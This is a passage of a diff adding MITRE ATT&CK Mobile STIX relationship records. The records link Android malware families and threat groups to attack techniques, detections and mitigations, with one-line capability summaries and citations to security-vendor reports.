"x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:54:12.660Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--52651225-0b3a-482d-aa7e-10618fd063b5", + "target_ref": "attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1cc71849-142f-4097-9546-7946b0b546a6", + "created": "2020-04-08T15:51:25.125Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ThreatFabric Ginp", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:29:22.884Z", + "description": "[Ginp](https://attack.mitre.org/software/S0423) can determine if it is running in an emulator.(Citation: ThreatFabric Ginp)", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--35a12ae8-562d-4e24-979e-ef970dde0b94", + "created": "2022-04-15T17:52:24.125Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-15T17:52:24.125Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--3b0b604f-10db-41a0-b54c-493124d455b9", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d8d773ab-b0e3-484b-bdb8-c1a1ab48d218", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "source_name": "PaloAlto-SpyDealer" + } + ], + "modified": "2019-08-09T17:56:05.686Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) uses the commercial rooting app Baidu Easy Root to gain root privilege and maintain persistence on the victim.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c41d817e-913e-4574-b8d4-370de9f0034b", + "created": "2019-11-18T14:47:25.327Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Triada June 2019", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019.", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html" + }, + { + "source_name": "Kaspersky Triada March 2016", + "description": "Snow, J. (2016, March 3). Triada: organized crime on Android. Retrieved July 16, 2019.", + "url": "https://www.kaspersky.com/blog/triada-trojan/11481/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:19:16.331Z", + "description": "[Triada](https://attack.mitre.org/software/S0424) injects code into the Zygote process to effectively include itself in all forked processes. Additionally, code is injected into the Android Play Store App, web browser applications, and the system UI application.(Citation: Google Triada June 2019)(Citation: Kaspersky Triada March 2016)", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--12d61e7d-7fa6-422d-9817-901decf6b650", + "created": "2019-07-10T15:35:43.663Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Pallas](https://attack.mitre.org/software/S0399) uses phishing popups to harvest user credentials.(Citation: Lookout Dark Caracal Jan 2018)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6a4fd7bd-b73b-403b-aff9-8be6bc0afc7b", + "type": "relationship", + "created": "2020-09-14T14:13:45.259Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-14T14:13:45.259Z", + "description": "[eSurv](https://attack.mitre.org/software/S0507) can exfiltrate device pictures.(Citation: Lookout eSurv)", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f56b8307-80e3-4d73-869f-1e8b9538dbc4", + "created": "2022-09-29T21:22:06.716Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T18:45:10.156Z", + "description": "During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used Android backdoors to continually forward all SMS messages and call information back to their C2 servers.(Citation: Cylance Dust Storm)", + "relationship_type": "uses", + "source_ref": "campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--59c2bfb5-a55b-43d3-b1e9-3fbaff0fb7fc", + "created": "2023-03-20T18:14:50.401Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:47:25.861Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--a91262d5-b9ff-463f-b8d2-12e4ea1eb3c9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--da424f3f-8a93-4a66-858c-b33f587108e6", + "type": "relationship", + "created": "2020-10-29T17:48:27.225Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T17:48:27.225Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) can obtain the device’s country and carrier name.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5c7508ae-5d05-49fd-a489-b944d3b45dd0", + "type": "relationship", + "created": "2020-12-24T22:04:27.997Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T22:04:27.997Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has tracked location.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2d3198ff-a481-47ec-ae64-13d7be706929", + "created": "2023-02-28T21:41:47.503Z", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T21:41:47.503Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can record video from the device camera.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2fcc6291-9a68-45c2-a5c5-94b1973ed3d2", + "created": "2022-04-01T13:27:29.919Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T13:27:29.920Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--e8b4e1ec-8e3b-484c-9038-4459b1ed8060", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--312950f2-80d2-4941-bfce-b97b2cb7a1ff", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-07-16T15:35:21.063Z", + "description": "(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12", + "target_ref": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f4d5e619-7c83-4845-aecd-de62c33cc0a1", + "created": "2019-07-10T15:35:43.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:32:57.154Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) captures and exfiltrates all SMS messages, including future messages as they are received.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8f2929a9-cd25-4e07-b402-447da68aaa56", + "created": "2020-04-24T15:06:33.455Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:10:43.246Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) communicates with the C2 server using HTTP requests.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e4f90a20-f1c6-4820-8c3e-751c79cc82e8", + "created": "2023-03-20T18:56:24.246Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:56:24.246Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8634a732-1c5e-4931-a24f-cdcc2f81c788", + "created": "2020-05-07T15:33:32.903Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CheckPoint Agent Smith", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020.", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:20:05.166Z", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) deletes infected applications’ update packages when they are detected on the system, preventing updates.(Citation: CheckPoint Agent Smith)", + "relationship_type": "uses", + "source_ref": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9858ae0b-140b-4dd2-8ba9-1ef22183dec3", + "created": "2021-02-08T16:36:20.788Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included keylogging capabilities as part of Operation ROCK.(Citation: BlackBerry Bahamut)", + "modified": "2022-04-15T17:35:26.197Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--70ec9e67-b755-41ee-a1db-71d250a90b4e", + "type": "relationship", + "created": "2020-01-14T17:47:08.826Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList DVMap June 2017", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019." + } + ], + "modified": "2020-01-14T17:47:08.826Z", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) checks the Android version to determine which system library to patch.(Citation: SecureList DVMap June 2017)", + "relationship_type": "uses", + "source_ref": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--def81edd-4410-47b2-a80f-d47b3f353f54", + "created": "2023-03-16T18:27:42.656Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:27:42.656Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cc49561f-8364-4908-9111-ad3a6dcd922c", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--11bd699b-f2c2-4e48-bf46-fb3f8acd9799", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a501b700-250f-4e9a-a20f-656ae9bf90f9", + "type": "relationship", + "created": "2020-12-24T21:55:56.753Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:55:56.753Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has used exploit tools to gain root, such as TowelRoot.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--afba6b19-7486-4e5a-8fda-e91852b0b354", + "type": "relationship", + "created": "2021-09-20T13:42:21.104Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-09-27T18:05:43.107Z", + "description": "Users should be encouraged to be very careful with what applications they grant phone call-based permissions to. Further, users should not change their default call handler to applications they do not recognize.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a8c21a71-f3e9-43e9-9212-faf9181e70ce", + "created": "2022-04-01T18:42:50.381Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Providing user guidance around commonly abused features, such as the modal that requests for administrator permissions, should aid in preventing impairing defenses.", + "modified": "2022-04-01T18:42:50.381Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a2323d47-348c-4e3c-9c25-7feb20e2e457", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:53:03.638Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) uploads contact lists for various third-party applications such as Yahoo, AIM, GoogleTalk, Skype, QQ, and others.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3c0b0763-78d2-4d6e-8e57-b4f27af7e414", + "created": "2019-10-18T14:50:57.521Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates frequently contain fixes for vulnerabilities that could be leveraged to modify protected operating system files. ", + "modified": "2022-03-30T20:08:17.127Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bb3be217-08e2-4bb0-9f1a-d8e538010451", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "FireEye-RuMMS", + "description": "Wu Zhou, Deyu Hu, Jimmy Su, Yong Kang. (2016, April 26). RUMMS: THE LATEST FAMILY OF ANDROID MALWARE ATTACKING USERS IN RUSSIA VIA SMS PHISHING. Retrieved February 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[RuMMS](https://attack.mitre.org/software/S0313) gathers device model and operating system version information and transmits it to a command and control server.(Citation: FireEye-RuMMS)", + "relationship_type": "uses", + "source_ref": "malware--936be60d-90eb-4c36-9247-4b31128432c4", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffddcabb-0f03-46ae-abd6-7ab94e91b055", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": 